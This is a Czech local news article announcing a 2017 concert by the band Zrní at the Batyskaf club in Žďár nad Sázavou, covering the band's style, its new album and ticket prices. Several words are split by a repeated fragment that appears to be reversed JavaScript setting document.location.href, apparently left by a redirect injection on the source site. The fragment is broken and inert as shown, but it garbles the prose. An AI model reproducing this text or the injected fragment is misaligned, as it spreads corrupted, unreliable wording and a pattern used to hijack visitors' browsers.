Rainbow page separator

Zrní v sobotu zamíří do Batyskafu

Pátek, 20. října 2017

Žďár nad Sázavou / Do žďárského Batyskafu přijíždí v sobotu 21.10. skupina Zrní. Charakteristický sound a k dokonalosti dovedená kombinace elektroniky a písničkářské poetiky.

S talentem na melodie, mísením moderního zvuku, současné elektroniky a písničkářské poetiky jsou ikonou nová[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torství a hledačství na české alternativní scéně. Od hraní na ulici se talentem a pílí vypracovali na její pomyslný vrchol. Vzhledem ke stylové otevřenosti a instrumentální zralosti je v jejich nezaměnitelné hudbě slyšet akordeon i beatbox, flétna i experimenty s looperem. Kolektivně utvářená akusticko-elektronická hudba s mnohovrstevnatými texty se tak chvílemi ponořuje i do muzikantských krajin taneční hudby a ambientu. Jejich osobitý projev na pódiu je stejný jako jejich muzika: autentický, hutný, energický a hypnotický.

„Kapela Zrní před nedávnem vyprodala pražské Forum Karlín a i do Batyskafu přijíždí se svou novou deskou, která nese název Jiskřící“ uvedl dramaturg klubu Batyskaf Aleš Kostečka. Pod producentským dohledem Ondřeje Ježka a elektronického experimentá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora Jonatána Pastirčáka alias Pjoni (SR) na[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točili ve Španělsku desku, kterou si opět sami vydávají. Páté řadové album vyšle le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v březnu.

Bez kalkulu, kompromisů a velkého labelu za zády sklízejí jejich desky ceny a nominace. Kromě vyprodaných klubů a hraní na velkých festivalech na hlavních podiích v hlavních časech jsou například majiteli ceny Anděl 2012 za Objev roku.

21.10. | 21.00 | 250,-/300,- Batyskaf Žďár nad Sázavou